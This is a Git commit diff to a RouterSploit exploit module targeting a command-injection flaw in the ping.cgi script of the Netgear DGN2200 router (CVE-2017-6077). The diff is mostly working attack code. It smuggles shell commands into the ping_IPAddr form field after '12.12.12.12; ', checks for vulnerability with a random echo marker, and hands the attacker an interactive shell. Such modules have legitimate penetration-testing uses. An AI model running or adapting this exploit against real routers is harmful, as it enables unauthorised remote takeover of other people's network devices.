Used utils shell() and http_request()

ee51c523 · Joshua Abraham · 8abab5a3 · ee51c523
Commit ee51c523 authored Feb 21, 2017 by Joshua Abraham
Show whitespace changes
Inline Side-by-side

Showing with 21 additions and 21 deletions

dgn2200_ping_cgi_rce.py ...ersploit/modules/exploits/netgear/dgn2200_ping_cgi_rce.py +21 -21

No files found.
--- a/routersploit/modules/exploits/netgear/dgn2200_ping_cgi_rce.py
+++ b/routersploit/modules/exploits/netgear/dgn2200_ping_cgi_rce.py
-import requests
 from routersploit import (
    exploits,
    print_error,
@@ -7,6 +5,9 @@ from routersploit import (
    print_status,
    mute,
    validators,
+    http_request,
+    random_text,
+    shell,
 )
@@ -19,10 +20,11 @@ class Exploit(exploits.Exploit):
        'description': 'Exploits Netgear DGN2200 RCE vulnerability in the ping.cgi script',
        'authors': [
            'SivertPL',  # vulnerability discovery
-            'Josh Abraham',  # routesploit module
+            'Josh Abraham <sinisterpatrician[at]google.com>',  # routesploit module
        ],
        'references': [
            'https://www.exploit-db.com/exploits/41394/',
+            'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6077',
        ],
        'devices': [
            'Netgear DGN2200v1',
@@ -43,25 +45,18 @@ class Exploit(exploits.Exploit):
        if self.check():
            print_success("Target is vulnerable")
            print_status("Invoking command loop...")
-            self.command_loop()
+            shell(self, architecture="mips")
        else:
            print_error("Target is not vulnerable")
-    def command_loop(self):
-        while True:
-            command = raw_input("cmd > ")
-            if command in ['exit', 'quit']:
-                return
-            r = self.execute(command)
-            for l in r:
-                print l.encode('utf-8')
    def execute(self, command):
-        r = requests.post(self.target + "/ping.cgi",
+        url = "{}/ping.cgi".format(self.target)
-                          data={'IPAddr1': 12, 'IPAddr2': 12, 'IPAddr3': 12, 'IPAddr4': 12, 'ping': "Ping", 'ping_IPAddr': "12.12.12.12; " + command},
+        data = {'IPAddr1': 12, 'IPAddr2': 12, 'IPAddr3': 12, 'IPAddr4': 12, 'ping': "Ping", 'ping_IPAddr': "12.12.12.12; " + command}
-                          auth=(self.login, self.password), headers={'referer': "http://192.168.0.1/DIAG_diag.htm"})
+        referer = "{}/DIAG_diag.htm".format(self.target)
+        headers = {'referer': referer}
+        r = http_request(method="POST", url=url, data=data, auth=(self.login, self.password), headers=headers)
        result = self.parse_output(r.text)
-        return result
+        return result.encode('utf-8')
    def parse_output(self, text):
        yet = False
@@ -74,12 +69,17 @@ class Exploit(exploits.Exploit):
                if line.startswith("</textarea>"):
                    break
                result.append(line)
-        return result
+        return "\n".join(result)
    @mute
    def check(self):
        """
-        Method that verifies if the target is vulnerable. It should not write anything on stdout and stderr.
+        Method that verifies if the target is vulnerable.
        """
-        r = self.execute("echo test123")
+        rand_marker = random_text(6)
-        return any("test123" in s for s in r)
+        command = "echo {}".format(rand_marker)
+        if rand_marker in self.execute(command):
+            return True
+        return False